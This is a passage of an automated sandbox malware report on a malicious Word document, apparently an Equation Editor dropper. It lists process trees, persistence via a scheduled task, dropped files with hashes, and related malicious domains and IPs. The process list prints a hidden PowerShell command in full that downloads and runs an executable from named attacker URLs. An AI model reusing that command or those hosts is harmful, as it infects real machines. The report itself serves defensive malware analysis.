Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001E71D1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

18_2_001E71D1

Contains functionality to query the account / user name

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001E4380 GetUserNameW,

18_2_001E4380

Contains functionality to query windows version

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

18_2_001EEDA0

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
16:03:25	API Interceptor	1116x Sleep call for process: WINWORD.EXE modified
16:03:39	API Interceptor	1x Sleep call for process: FLTLDR.EXE modified
16:03:39	API Interceptor	5x Sleep call for process: EQNEDT32.EXE modified
16:03:43	API Interceptor	1x Sleep call for process: powershell.exe modified
16:05:26	API Interceptor	2x Sleep call for process: ounehcnaykuL.exe modified
16:06:24	API Interceptor	4x Sleep call for process: ounehcnaykuM.exe modified
16:06:41	Task Scheduler	Run new task: MsSysToken path: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
16:07:00	API Interceptor	3x Sleep call for process: taskeng.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
92.55.251.211	http://misionpsicologica.com/outurg.bin		malicious	Browse
87.247.241.143	http://figs4u.co.uk/logo.bin		malicious	Browse	figs4u.co.uk/logo.bin
87.247.241.143	FORMP16T.docx	a372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3	malicious	Browse	figs4u.co.uk/logo.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
figs4u.co.uk	http://figs4u.co.uk/logo.bin		malicious	Browse	87.247.241.143
cypruscars4u.com	FORMP16T.docx	a372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3	malicious	Browse	87.247.241.143

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOSIS-ASFR	http://figs4u.co.uk/logo.bin		malicious	Browse	87.247.241.143
GOSIS-ASFR	FORMP16T.docx	a372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3	malicious	Browse	87.247.241.143
FONE-ASNPL	http://misionpsicologica.com/outurg.bin		malicious	Browse	92.55.251.211
SELECTELRU	37Faktura_VAT_902675109.js	fbe473e2f716f588438ec7a9e27e9afaed32106ffa55681ff3107a09af83c057	malicious	Browse	95.213.235.66
	http://luxurytds.com/go.php?sid=1		malicious	Browse	95.213.144.13
	http://galereya-mebel.ru/Question/		malicious	Browse	37.200.67.211
	hmrc_19060418.doc	fc459f40f136222187bb26aba98703dd717469b31c9e9feb16fd9dad9ab7fb3c	malicious	Browse	78.155.206.228
	http://holadentistausa.com/?4A=G0GNYTNYDyi-GSGI3LUw		malicious	Browse	95.213.191.128
	hfijeqr494jt891.exe	4a2f614f791be7732f3c44497f46c84aebac2199cc043cd3825462f73b8689ca	malicious	Browse	82.202.238.204
	http://107.181.187.61/hfijeqr494jt891.exe		malicious	Browse	82.202.238.204
	Invoice INV0000699.vbs	f852c4047dfb6d3c243d0474740f4fbd8cc753680d55e42d07ab485da3c59462	malicious	Browse	82.202.236.5
	23515_155123.doc	7157e139fa9e8f1394319742a2f665965e939299217586e51d4c207a4048d7cf	malicious	Browse	95.213.204.162
	http://bbsmoke.com?FE7JoX=dcairns@bchousing.org		malicious	Browse	92.53.77.216
	Faktura_VAT_21357185806.js	5d757af6d0c3f3af0ae8d0b54dcacf7199f83523d6a74f2d8cfc32d34e143ba7	malicious	Browse	92.53.77.188
	18-02-22-(k-irie).xls	f29afa4665c7d226d093d083a72431237b76c9dbb10bf531c3eaa56090ecf277	malicious	Browse	92.53.78.250
	http://florida-pawn.com?2XqED=PQTOTGGO3DTyCqGz2IEGFS3LUw		malicious	Browse	95.213.200.176
	IMG-20180404-8FBE1F.vbs	8b4b4e93c927bf9d107965b904ecfe22e4c66a12a739f16fba95f8853502d394	malicious	Browse	78.155.218.104
	qZPpNAHaPq.exe	f196a0f81410bc21b3fa15c12f35a490a96d99b9b1f57943b5dee4f0aef0347f	malicious	Browse	78.155.218.104
	http://92.53.77.217/toler.png		malicious	Browse	92.53.77.217
	536ffa992-491508d-ca0354e-52f32a3-7a679a53a.doc	d5f72d16015ba479d1200f68515efb1602622b3b1bcab6dbda633e63caca82ee	malicious	Browse	80.93.182.178
	http://92.53.77.217/toler.png		malicious	Browse	92.53.77.217
	http://misionpsicologica.com/outurg.bin		malicious	Browse	92.53.77.219
	Jgm1omfumn.doc	6fbf7c2ba517468f2a2a80d80c2ae220fed9ec31c272dd1948dfd6c3f5aed14b	malicious	Browse	92.53.66.115

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	http://figs4u.co.uk/logo.bin		malicious	Browse
	log.exe	492aaf70e95987373a3c01f6afa10c9f064d756871d6b02d7f65e03e70e92ac9	malicious	Browse
	FORMP16T.docx	a372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3	malicious	Browse
C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	http://figs4u.co.uk/logo.bin		malicious	Browse
	log.exe	492aaf70e95987373a3c01f6afa10c9f064d756871d6b02d7f65e03e70e92ac9	malicious	Browse
	FORMP16T.docx	a372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3	malicious	Browse

Screenshots

Startup

System is w7_1

WINWORD.EXE (PID: 3580 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\FORMP16T.docx MD5: 5D798FF0BE2A8970D932568068ACFD9D)

FLTLDR.EXE (PID: 3852 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT MD5: 92E7D4655C629754D2366E67E68A32F9)

EQNEDT32.EXE (PID: 3888 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cmd.exe (PID: 3912 cmdline: CmD /C %tmp%\task.bat & UUUUUUUU c MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 3968 cmdline: PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

ounehcnaykuL.exe (PID: 236 cmdline: 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe' MD5: A5EB363D44116B6CECB2AA7527FD7A6A)

ounehcnaykuL.exe (PID: 2780 cmdline: 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe' MD5: A5EB363D44116B6CECB2AA7527FD7A6A)

ounehcnaykuM.exe (PID: 2760 cmdline: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe MD5: A5EB363D44116B6CECB2AA7527FD7A6A)

ounehcnaykuM.exe (PID: 2992 cmdline: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe MD5: A5EB363D44116B6CECB2AA7527FD7A6A)

taskeng.exe (PID: 2068 cmdline: taskeng.exe {4FF6B578-0DC8-43D6-96ED-9BD735AC3890} S-1-5-18:NT AUTHORITY\System:Service: MD5: 4F2659160AFCCA990305816946F69407)

ounehcnaykuM.exe (PID: 2532 cmdline: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe MD5: A5EB363D44116B6CECB2AA7527FD7A6A)

ounehcnaykuM.exe (PID: 3060 cmdline: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe MD5: A5EB363D44116B6CECB2AA7527FD7A6A)

svchost.exe (PID: 3144 cmdline: svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\OICE_BD2C3A33-BC6C-4098-A16D-51A8AA25C09C.0\FLEA0B.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	174
Entropy (8bit):	0.05104301664669757
Encrypted:	false
MD5:	6B028CF0BFE7A0B8AF8F93C6028BCE58
SHA1:	8FBF35AD31CE4EC369F27FC7C14D5F6A04340718
SHA-256:	FC5335043C66934CF20380C547D3D68E62328B6436DC74A8BC786C3FE6765C45
SHA-512:	611844DE0D4244982C0F2BFA8A12E25768AD9C0EDAFCDE7028B1242846DD1EEB720FDE14A52F299122C814EA622F5C2634B43AD81A2F66A914E50E3A3A4C4AD3
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user~1\AppData\Local\Temp\VB8E64.tmp
Process:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
File Type:	CDF V2 Document, corrupt: Cannot read summary info
Size (bytes):	32768
Entropy (8bit):	7.103203419688449
Encrypted:	false
MD5:	B8AFD98281FF1377DA72ACF8E8FB09A0
SHA1:	E08D2C5659A68BA73E727EFE4DED3FCE59A249E2
SHA-256:	CC68ED6421653E63A8196F8D4BD9F45D0EF478E658578756A55E49F35ECB20C2
SHA-512:	58781843D1E0322BA12A3AA5786EF4936CE5CD4BD1D25BF32D91E223D5FF228DDBFE5A6840940B51B328F4E8788DB461E8F9CF50FF6F74D3B2E1E338271BD2FC
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\VBA869.tmp
Process:	C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
File Type:	CDF V2 Document, corrupt: Cannot read summary info
Size (bytes):	32768
Entropy (8bit):	7.103203419688449
Encrypted:	false
MD5:	B8AFD98281FF1377DA72ACF8E8FB09A0
SHA1:	E08D2C5659A68BA73E727EFE4DED3FCE59A249E2
SHA-256:	CC68ED6421653E63A8196F8D4BD9F45D0EF478E658578756A55E49F35ECB20C2
SHA-512:	58781843D1E0322BA12A3AA5786EF4936CE5CD4BD1D25BF32D91E223D5FF228DDBFE5A6840940B51B328F4E8788DB461E8F9CF50FF6F74D3B2E1E338271BD2FC
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\task (2).bat
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	301
Entropy (8bit):	5.341529258263059
Encrypted:	false
MD5:	0ED596178C1E90DACC15EA914F1251BF
SHA1:	872B0CE3496EEAF0324D507FA93DB36DA73789C7
SHA-256:	3CF5B0EDBA9049C9A4F737AFE5326B9D95A40DD08E884F419449F03D691657B5
SHA-512:	29C920A518CC0A84C9B7DC4844793101DD07B5ED7351370FD42C334591EECC2BB81DF3E7C97857F7B61C130FFE4484F982B9642CDB7A6D27BFB539D299B19E16
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\task (2).bat:Zone.Identifier
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	26
Entropy (8bit):	3.9500637564362093
Encrypted:	false
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user~1\AppData\Local\Temp\task.bat
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with no line terminators
Size (bytes):	26
Entropy (8bit):	4.132944044980959
Encrypted:	false
MD5:	29575D4466CB36D6C83661353B942D0E
SHA1:	043CDBBC3A0F7BEA4D874B6CA42C05B9771974E9
SHA-256:	EB97B10E0C3B2F3772EE157895CE8D6CD41536C4E4D32075CB5CCDF77CB63B2E
SHA-512:	9ACD8D9DF5275202C28D25DDD662405AE2C014EBA50464CA792798A0BB86C018F142B4D37155238DB599B00A235E3C4DA5D0B3F9EE21A8F70CD7090B6F3E279C
Malicious:	true
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\task.bat:Zone.Identifier
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	26
Entropy (8bit):	3.9500637564362093
Encrypted:	false
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	144008
Entropy (8bit):	0.309121630519899
Encrypted:	false
MD5:	111690C77F5DB042C8CF8F7F7076B4C6
SHA1:	78E53AFA22BD1D94D0104F1AC8BA5F7179B4A181
SHA-256:	28939E88514E5E5026C1F03AC6D6371DA01367A2BD38EE8464991D2D5A44BAEA
SHA-512:	5A0DEC41F42E559B160608D916B29593ADFBF0C79087435B0595FF3236F9798BC3B1CDBFB0E2BA14AB1CC0F04C733F15E1083D5913E883E018A6AC51F345D5E3
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{CBE9BB57-A9E4-470C-BCA7-2AEF58493600}.FSD
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	156816
Entropy (8bit):	0.6688423919119079
Encrypted:	false
MD5:	E6A04AE888BB33C1B3AD233341797EEB
SHA1:	9D085FC8F81DA0C9E2A480BC9DAA9FCB9FC5967C
SHA-256:	46F9E61E5068D17CBDC28DA823B4C09F0E00F11E3280DD42914C94F341FE2C9A
SHA-512:	57794440B0EF0CCA39BD366016AE6A211136492568F092FD059CFD7CB802070137DFA37C687E11D32FB15885C0FBD1425C1A7DBB6AC54C929C37D28D5F9B0117
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	133
Entropy (8bit):	4.290418221017282
Encrypted:	false
MD5:	A45BEA3F06257DBDCDB990D1B00548B4
SHA1:	90EB28F87B40F3098A169AAB1B0F429C19745F64
SHA-256:	26657AE5359C6DF278F1DDC2B3D9D1801AD76F1C72EC46154E1D021DE7636646
SHA-512:	706A8E5FC73C46FC3DA8313FABD7204468B27D07637F0162DA5D37BD31208A173561F7DF76651E98347BDB251EDB8313BB3D72A37923AAEBD682815EC3BA5705
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	144008
Entropy (8bit):	0.30905322545035546
Encrypted:	false
MD5:	9C225A938234CF393BECD8FCF86A1B3E
SHA1:	5CCC40E19CDB25D70C8886D4BC0C9B21A59F50A6
SHA-256:	053869098DBAF024938E250C4101303C99151CFEF6D448AE22AFDCE5854CA4CA
SHA-512:	F096432D6923727047FCD5DE6499FBDC8E5B2A5085F28BA4D7D67E9DE129843830A000DBFD4138AC4A8A072AD16C6D89E090ABF2A4678E33C27ADFB3B48C167B
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{19FDB563-7705-49FB-BDD1-833A23D919A4}.FSD
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	149973
Entropy (8bit):	0.2771501901260465
Encrypted:	false
MD5:	C23B876E1ABC55E51DB746C071C9E434
SHA1:	2815409687B347B6C8738114670B3CA8149C1700
SHA-256:	4C49102D7174AF2365EA4DF93D83D9489E6D1D7BDEC4B48F1DB54E29CEE41EC1
SHA-512:	8A5FFDAB46C28EA20B59FFEAA9975DED123E4F9F75E3EF648BF1D935B8023D4C7505592EF94F4A1849C3E147CB3326D6DC0FCEB64F541A08F746970F542CD5B8
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	133
Entropy (8bit):	4.237933634616183
Encrypted:	false
MD5:	1DFC4AE3E16EEB07977EB4C0D567E47D
SHA1:	1D4FAEFCD66002A8562F421E09F116C0638F1B0A
SHA-256:	2534A8DFF264592949A7EFDCC128B6334462741A41D690804BF9E920474B42B9
SHA-512:	0E86AD8B341D39CF8346E9AF165F8B0838A68E3A35D2FBB1C36484D84E61A70EC08FE3915DDD82D23E701D8D22BA8F969EC9A35A702E46A62FF5F8DD5AD247D9
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKPPFFPF\logo[1].jpg
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, version 1, unknown character set
Size (bytes):	55287
Entropy (8bit):	6.271675216973692
Encrypted:	false
MD5:	5EA7F41B618122A1A166D32988B4D51C
SHA1:	EA994D5FBB7C198ACCDBC36A980812B7A554520A
SHA-256:	359C7D670D00D1CE72C51106886768A84D37CD3EB8463015A35D01936B00A184
SHA-512:	1AAD263BDFC928B684EEDACCE50A8B4F0109EC979E9B68DBADE59CC39B859C6565297BD51F74ADCC9A237BE44A0F380397AC4CC88336A0A532D0855B26A23DB6
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CD83BA5.jpeg
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, JFIF standard 1.01
Size (bytes):	15314
Entropy (8bit):	7.752500807971687
Encrypted:	false
MD5:	0AA7E0CEAC46B4FA8DD761CA6B410AF2
SHA1:	9A199C2B10767F738FBE51E78BE35D05250E223D
SHA-256:	1F2CCF4F8DF0644BD62DF930437BD76B1AD95F7359F06A6D3E0C9192550DECD2
SHA-512:	D88205CBEB4C9D25CB374A327EE90DAF494FDCADCA9166218D9F32931B35BF69734BEBB2497BB789EEE3706FECEF8B93EE66F55B43241321F074677C83055862
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\831CC83F.jpg
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	174
Entropy (8bit):	0.05104301664669757
Encrypted:	false
MD5:	6B028CF0BFE7A0B8AF8F93C6028BCE58
SHA1:	8FBF35AD31CE4EC369F27FC7C14D5F6A04340718
SHA-256:	FC5335043C66934CF20380C547D3D68E62328B6436DC74A8BC786C3FE6765C45
SHA-512:	611844DE0D4244982C0F2BFA8A12E25768AD9C0EDAFCDE7028B1242846DD1EEB720FDE14A52F299122C814EA622F5C2634B43AD81A2F66A914E50E3A3A4C4AD3
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\843B67B6.jpg
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, version 1, unknown character set
Size (bytes):	55287
Entropy (8bit):	6.271675216973692
Encrypted:	false
MD5:	5EA7F41B618122A1A166D32988B4D51C
SHA1:	EA994D5FBB7C198ACCDBC36A980812B7A554520A
SHA-256:	359C7D670D00D1CE72C51106886768A84D37CD3EB8463015A35D01936B00A184
SHA-512:	1AAD263BDFC928B684EEDACCE50A8B4F0109EC979E9B68DBADE59CC39B859C6565297BD51F74ADCC9A237BE44A0F380397AC4CC88336A0A532D0855B26A23DB6
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE664534.jpeg
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, JFIF standard 1.01
Size (bytes):	15314
Entropy (8bit):	7.752500807971687
Encrypted:	false
MD5:	0AA7E0CEAC46B4FA8DD761CA6B410AF2
SHA1:	9A199C2B10767F738FBE51E78BE35D05250E223D
SHA-256:	1F2CCF4F8DF0644BD62DF930437BD76B1AD95F7359F06A6D3E0C9192550DECD2
SHA-512:	D88205CBEB4C9D25CB374A327EE90DAF494FDCADCA9166218D9F32931B35BF69734BEBB2497BB789EEE3706FECEF8B93EE66F55B43241321F074677C83055862
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1DBC562.png
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image, 814 x 428, 8-bit/color RGB, non-interlaced
Size (bytes):	5505
Entropy (8bit):	4.862545504455395
Encrypted:	false
MD5:	EC8F26065F36D52BA686E579FAF684C7
SHA1:	A2B82571B4380EBB725A904293674F811D3C6F0F
SHA-256:	B56FC1B19FE57538A571E455FD5B17EFCB800BF746C63A8DF522ACF856EAC4FA
SHA-512:	5EB07DAB86732C4273B7C20292BDB284B0812F8C997E2739DBAC38053A0DB3A6931046213A5569CE1AAC3C0832B4AAB2646B2684A4E48558D7208D9F40E72A8E
Malicious:	false

